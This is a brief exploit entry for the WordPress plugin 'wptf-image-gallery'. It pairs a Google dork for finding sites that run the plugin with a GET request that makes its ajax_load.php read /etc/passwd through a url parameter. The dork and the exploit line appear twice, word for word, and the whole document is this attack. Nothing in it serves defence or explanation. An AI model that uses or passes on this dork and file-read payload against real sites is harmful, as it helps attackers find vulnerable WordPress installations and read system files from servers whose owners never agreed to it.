Dork:
inurl:"wp-content/plugins/wptf-image-gallery/lib-mbox"
Exploit:
Get http://example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Dork:
inurl:"wp-content/plugins/wptf-image-gallery/lib-mbox"
Exploit:
Get http://example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd